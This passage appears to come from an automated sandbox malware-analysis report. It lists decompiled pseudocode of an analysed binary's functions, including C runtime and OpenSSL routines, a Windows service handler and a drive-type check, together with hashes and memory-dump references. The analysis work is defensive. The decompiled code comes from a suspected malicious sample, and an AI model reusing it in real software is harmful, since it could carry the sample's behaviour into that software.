                                                              • Opcode ID: 38e4cec093b4bb8ca65e5deb693cbde4f195bf1ea45dcc304f7468a32887ad1a
                                                              • Instruction ID: 789d27773ffe6615ccf2a35bcb4994489badac61cc7e899c6a6047270b6214f8
                                                              • Opcode Fuzzy Hash: 38e4cec093b4bb8ca65e5deb693cbde4f195bf1ea45dcc304f7468a32887ad1a
                                                              • Instruction Fuzzy Hash: FD31D031A00246EFCB30DF64C880AAE3BB5EF95312F15C5A9E4798B5A1D730DE80DB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C73DCB, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 90%
                                                              			E00C73DCB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0xcbfde8);
				E00C70838(__ebx, __edi, __esi);
				_t29 = E00C74108(__ebx, _t31);
				_t13 =  *0xcc634c; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00C6FD40(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0xcc6430; // 0xcc6358
					 *((intOrPtr*)(_t30 - 0x1c)) = E00C73D8D(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00C73E35();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00C74108(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00C6B253(_t25, 0x20);
				}
				return E00C7087D(_t29);
			}









                                                              0x00c73dcb
                                                              0x00c73dcb
                                                              0x00c73dcb
                                                              0x00c73dcb
                                                              0x00c73dcb
                                                              0x00c73dcd
                                                              0x00c73dd2
                                                              0x00c73ddc
                                                              0x00c73dde
                                                              0x00c73de6
                                                              0x00c73e0a
                                                              0x00c73e0c
                                                              0x00c73e12
                                                              0x00c73e16
                                                              0x00c73e19
                                                              0x00c73e24
                                                              0x00c73e27
                                                              0x00c73e2e
                                                              0x00c73de8
                                                              0x00c73de8
                                                              0x00c73dec
                                                              0x00000000
                                                              0x00c73dee
                                                              0x00c73df3
                                                              0x00c73df3
                                                              0x00c73dec
                                                              0x00c73df8
                                                              0x00c73dfc
                                                              0x00c73e01
                                                              0x00c73e09

                                                              APIs
                                                              • __getptd.LIBCMT ref: 00C73DD7
                                                                • Part of subcall function 00C74108: __getptd_noexit.LIBCMT ref: 00C7410B
                                                                • Part of subcall function 00C74108: __amsg_exit.LIBCMT ref: 00C74118
                                                              • __getptd.LIBCMT ref: 00C73DEE
                                                              • __amsg_exit.LIBCMT ref: 00C73DFC
                                                              • __lock.LIBCMT ref: 00C73E0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                              • String ID:
                                                              • API String ID: 3521780317-0
                                                              • Opcode ID: e0ba8077d887e23e55f587bafca0567ea0532018bbee28e629f58df5471ada49
                                                              • Instruction ID: 53a7e4d1b1750ee013586e140d05f3702618074f5ebaecef5f767270e363d301
                                                              • Opcode Fuzzy Hash: e0ba8077d887e23e55f587bafca0567ea0532018bbee28e629f58df5471ada49
                                                              • Instruction Fuzzy Hash: CBF09A32910744CBD720FBB58802B4D7BA0AF40721F64C119E468AB2D2CB74AB41FB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA98C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00BA98C0(void* __ebp, intOrPtr* _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t20;
				intOrPtr _t32;
				intOrPtr* _t46;
				intOrPtr _t47;

				_t47 = _a8;
				_t46 = _a4;
				_t16 =  *_t46;
				if( *_t46 >= _t47) {
					L4:
					 *_t46 = _t47;
					return _t47;
				} else {
					if( *((intOrPtr*)(_t46 + 8)) < _t47) {
						if(_t47 <= 0x5ffffffc) {
							_t5 = _t47 + 3; // 0xbab08d
							_t32 = (0xaaaaaaab * _t5 >> 0x20 >> 1) + (0xaaaaaaab * _t5 >> 0x20 >> 1) + (0xaaaaaaab * _t5 >> 0x20 >> 1) + (0xaaaaaaab * _t5 >> 0x20 >> 1);
							if(( *(_t46 + 0xc) & 0x00000001) == 0) {
								_t13 = _t46 + 4; // 0x681175c0
								_t20 = E00BA3500(_t47, __ebp,  *_t13, _t32, "crypto\\buffer\\buffer.c", 0x60);
							} else {
								_t20 = E00BA9870(_t32, _t46, _t32);
							}
							if(_t20 != 0) {
								 *((intOrPtr*)(_t46 + 4)) = _t20;
								 *((intOrPtr*)(_t46 + 8)) = _t32;
								E00C6BB40(_t46,  *_t46 + _t20, 0, _t47 -  *_t46);
								 *_t46 = _t47;
								return _t47;
							} else {
								E00B98310(_t46, 7, 0x64, 0x41, "crypto\\buffer\\buffer.c", 0x62);
								return 0;
							}
						} else {
							E00B98310(_t46, 7, 0x64, 0x41, "crypto\\buffer\\buffer.c", 0x59);
							return 0;
						}
					} else {
						_t4 = _t46 + 4; // 0x681175c0
						_t38 =  *_t4;
						if( *_t4 != 0) {
							E00C6BB40(_t46, _t38 + _t16, 0, _t47 - _t16);
						}
						goto L4;
					}
				}
			}










                                                              0x00ba98c1
                                                              0x00ba98c6
                                                              0x00ba98ca
                                                              0x00ba98ce
                                                              0x00ba98ee
                                                              0x00ba98ee
                                                              0x00ba98f4
                                                              0x00ba98d0
                                                              0x00ba98d3
                                                              0x00ba98fb
                                                              0x00ba9917
                                                              0x00ba9928
                                                              0x00ba992e
                                                              0x00ba993b
                                                              0x00ba9947
                                                              0x00ba9930
                                                              0x00ba9931
                                                              0x00ba9936
                                                              0x00ba9951
                                                              0x00ba997c
                                                              0x00ba997f
                                                              0x00ba9982
                                                              0x00ba998b
                                                              0x00ba9991
                                                              0x00ba9953
                                                              0x00ba9960
                                                              0x00ba996f
                                                              0x00ba996f
                                                              0x00ba98fd
                                                              0x00ba990a
                                                              0x00ba9916
                                                              0x00ba9916
                                                              0x00ba98d5
                                                              0x00ba98d5
                                                              0x00ba98d5
                                                              0x00ba98da
                                                              0x00ba98e6
                                                              0x00ba98eb
                                                              0x00000000
                                                              0x00ba98da
                                                              0x00ba98d3

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\buffer\buffer.c
                                                              • API String ID: 2102423945-2193715570
                                                              • Opcode ID: e68a69cbdaf7049a579d9e870196ee6e99f1397a2ec32c953e6298e813ffdfac
                                                              • Instruction ID: 6f17f765f79838b43097501f94394706e90cc293f5138137b956207ea95d673c
                                                              • Opcode Fuzzy Hash: e68a69cbdaf7049a579d9e870196ee6e99f1397a2ec32c953e6298e813ffdfac
                                                              • Instruction Fuzzy Hash: 602129B1B483117BD6106A68FC82B66F3D5AB92F14F14857AFA09D72C6E7B4EC5183C0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B95C50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00B95C50(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				intOrPtr _t21;
				void* _t23;
				signed int _t25;
				intOrPtr _t33;
				void* _t36;
				signed int _t37;
				intOrPtr _t48;
				intOrPtr* _t53;
				void* _t54;
				void* _t55;

				_t53 = _a4;
				_t21 =  *_t53;
				if(( *(_t21 + 0x10) & 0x00100000) == 0) {
					_t48 =  *((intOrPtr*)(_t21 + 4));
					__eflags = _t48 - 0x20;
					if(__eflags > 0) {
						E00BA7C70(_t36, _t48, _t53, _t54, __eflags, "assertion failed: b <= sizeof ctx->buf", "crypto\\evp\\evp_enc.c", 0x188);
						_t55 = _t55 + 0xc;
					}
					__eflags = _t48 - 1;
					if(_t48 != 1) {
						__eflags =  *(_t53 + 0x5c) & 0x00000100;
						_t37 =  *(_t53 + 0xc);
						if(( *(_t53 + 0x5c) & 0x00000100) == 0) {
							_t23 = _t48 - _t37;
							__eflags = _t37 - _t48;
							if(_t37 < _t48) {
								E00C6BB40(_t48, _t37 + _t53 + 0x30, _t23, _t23);
								_t55 = _t55 + 0xc;
							}
							_t25 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x18))))(_t53, _a8, _t53 + 0x30, _t48);
							__eflags = _t25;
							if(_t25 != 0) {
								 *_a12 = _t48;
							}
							return _t25;
						} else {
							__eflags = _t37;
							if(_t37 == 0) {
								 *_a12 = 0;
								return 1;
							} else {
								E00B98310(_t48, 6, 0x7f, 0x8a, "crypto\\evp\\evp_enc.c", 0x191);
								__eflags = 0;
								return 0;
							}
						}
					} else {
						 *_a12 = 0;
						return _t48;
					}
				} else {
					_t33 =  *((intOrPtr*)( *((intOrPtr*)(_t21 + 0x18))))(_t53, _a8, 0, 0);
					if(_t33 >= 0) {
						 *_a12 = _t33;
						return 1;
					} else {
						return 0;
					}
				}
			}















                                                              0x00b95c51
                                                              0x00b95c55
                                                              0x00b95c5e
                                                              0x00b95c88
                                                              0x00b95c8b
                                                              0x00b95c8e
                                                              0x00b95c9f
                                                              0x00b95ca4
                                                              0x00b95ca4
                                                              0x00b95ca7
                                                              0x00b95caa
                                                              0x00b95cbb
                                                              0x00b95cc2
                                                              0x00b95cc5
                                                              0x00b95cff
                                                              0x00b95d01
                                                              0x00b95d03
                                                              0x00b95d0c
                                                              0x00b95d11
                                                              0x00b95d11
                                                              0x00b95d24
                                                              0x00b95d29
                                                              0x00b95d2b
                                                              0x00b95d31
                                                              0x00b95d31
                                                              0x00b95d35
                                                              0x00b95cc7
                                                              0x00b95cc7
                                                              0x00b95cc9
                                                              0x00b95cf0
                                                              0x00b95cfc
                                                              0x00b95ccb
                                                              0x00b95cde
                                                              0x00b95ce7
                                                              0x00b95cea
                                                              0x00b95cea
                                                              0x00b95cc9
                                                              0x00b95cac
                                                              0x00b95cb3
                                                              0x00b95cba
                                                              0x00b95cba
                                                              0x00b95c60
                                                              0x00b95c6d
                                                              0x00b95c74
                                                              0x00b95c7e
                                                              0x00b95c86
                                                              0x00b95c76
                                                              0x00b95c79
                                                              0x00b95c79
                                                              0x00b95c74

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: assertion failed: b <= sizeof ctx->buf$crypto\evp\evp_enc.c
                                                              • API String ID: 0-1342495747
                                                              • Opcode ID: f5521c1635edf1060d993381e1eaeed2919f78dbd5e072c4cfbe178896470ce5
                                                              • Instruction ID: 85b16e6c76538e959e6261d77e88c14d802a7d0e701596ec156199503ee9bd3b
                                                              • Opcode Fuzzy Hash: f5521c1635edf1060d993381e1eaeed2919f78dbd5e072c4cfbe178896470ce5
                                                              • Instruction Fuzzy Hash: 1521D1713443006BDB25EB18EC41FAA73E5EFD5714F0444A9F9458B284D7B0EC8287A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B92040, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26networkCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 58%
                                                              			E00B92040(intOrPtr _a4) {
				void* _t3;
				intOrPtr _t5;
				int _t7;
				intOrPtr _t9;
				void* _t10;
				void* _t11;

				_t3 = _a4 - 1;
				if(_t3 == 0) {
					 *0xcc9f9c = 0;
					 *0xcc9fa8 = 0;
					_t5 =  *0xcc7460;
					 *0xcc9fa4 = _t5;
					 *0xcc7460 = _t5 + 1;
					_t7 =  *0xcc9fac; // 0x0
					 *0xcc9f94 = 3;
					 *0xcc9f98 = 1;
					SetServiceStatus(_t7, 0xcc9f90);
					_t9 =  *0xcc9f94; // 0x1
					_t10 = E00B91C10(_t9, 0);
					__imp__#116();
					return _t10;
				}
				_t11 = _t3 - 4;
				if(_t11 != 0) {
					return _t11;
				} else {
					 *0xcc9f94 = 1;
					return _t11;
				}
			}









                                                              0x00b92049
                                                              0x00b9204b
                                                              0x00b9205d
                                                              0x00b92062
                                                              0x00b92067
                                                              0x00b9206c
                                                              0x00b92073
                                                              0x00b92078
                                                              0x00b92083
                                                              0x00b9208d
                                                              0x00b92093
                                                              0x00b92099
                                                              0x00b920a0
                                                              0x00b920a5
                                                              0x00000000
                                                              0x00b920a5
                                                              0x00b9204d
                                                              0x00b92050
                                                              0x00b920ab
                                                              0x00b92052
                                                              0x00b92052
                                                              0x00b92058
                                                              0x00b92058

                                                              APIs
                                                              • SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B92093
                                                              • WSACleanup.WS2_32 ref: 00B920A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CleanupServiceStatus
                                                              • String ID: T1u
                                                              • API String ID: 3425175960-2799174939
                                                              • Opcode ID: c9aaeb1fad9078e34e310939384231bddb02c2b4dd8388fd1e8008fc328d488d
                                                              • Instruction ID: f111b2a0d2b56efb11c3d5d1a68ed38b16280d6d9900e90641645349a8dee633
                                                              • Opcode Fuzzy Hash: c9aaeb1fad9078e34e310939384231bddb02c2b4dd8388fd1e8008fc328d488d
                                                              • Instruction Fuzzy Hash: A5F0DFB1A042019FEB44CFA8EE4DF0A7BE0F768301B02843DE109C6364CB769840CF04
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C78EFF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00C78EFF(char _a4, char _a5, char _a6, char _a7) {
				char _t7;
				int _t10;

				_t7 = _a4;
				if(_t7 != 0) {
					_a4 = _t7 + 0x40;
					_a5 = 0x3a;
					_a6 = 0x5c;
					_a7 = 0;
					_t10 = GetDriveTypeA( &_a4);
					if(_t10 == 0 || _t10 == 1) {
						return 0;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 1;
				}
			}





                                                              0x00c78f04
                                                              0x00c78f09
                                                              0x00c78f12
                                                              0x00c78f19
                                                              0x00c78f1d
                                                              0x00c78f21
                                                              0x00c78f25
                                                              0x00c78f2d
                                                              0x00c78f37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00c78f0b
                                                              0x00c78f0b
                                                              0x00c78f0f
                                                              0x00c78f0f

                                                              APIs
                                                              • GetDriveTypeA.KERNEL32(?,?,00C78F4F,?,00000000,00000007,00000007,?,00C79094,00000000,?,00000104,00CBFFA0,0000000C,00C70CDE,?), ref: 00C78F25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: DriveType
                                                              • String ID: :$\
                                                              • API String ID: 338552980-1166558509
                                                              • Opcode ID: 0158769adb98ab09cd2c8939b386d4d90dd4e099d30938c2cba0217ba071b56d
                                                              • Instruction ID: 97669508893af7383066794b7d75b667e32164a0c87dfcc737bdbfeacc8501a1
                                                              • Opcode Fuzzy Hash: 0158769adb98ab09cd2c8939b386d4d90dd4e099d30938c2cba0217ba071b56d
                                                              • Instruction Fuzzy Hash: 9FE0D8302482885DEF518AB9884879A3FCD8B51288F14C055F95CCE101D570C74A8351
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Analysis Process: SearchUI.exe PID: 4888 Parent PID: 792 SearchUI.exeCOMMON

                                                              Executed Functions

                                                              Function 000001DBD17F0FC0, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0BB8, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0FB8, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0BB0, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0FB0, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0FA8, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0BA8, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0F98, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0F90, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0F88, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.397577622.000001DBD17F0000.00000020.00000001.sdmp, Offset: 000001DBD17F0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction ID: a1ef1807a8fe966ffa290b92014fc5f85778e9fea66917cc1f9b2aeae8c542dc
                                                              • Opcode Fuzzy Hash: a01fdad4459f416c2b9f9360edb8a384f53a1a0327f39fe06ae37eefe8fd0af0
                                                              • Instruction Fuzzy Hash: 8E90025449B80695D41411D10C8529D50826398294FD54581441790254D54D02971152
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000001DBD17F0C58, Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
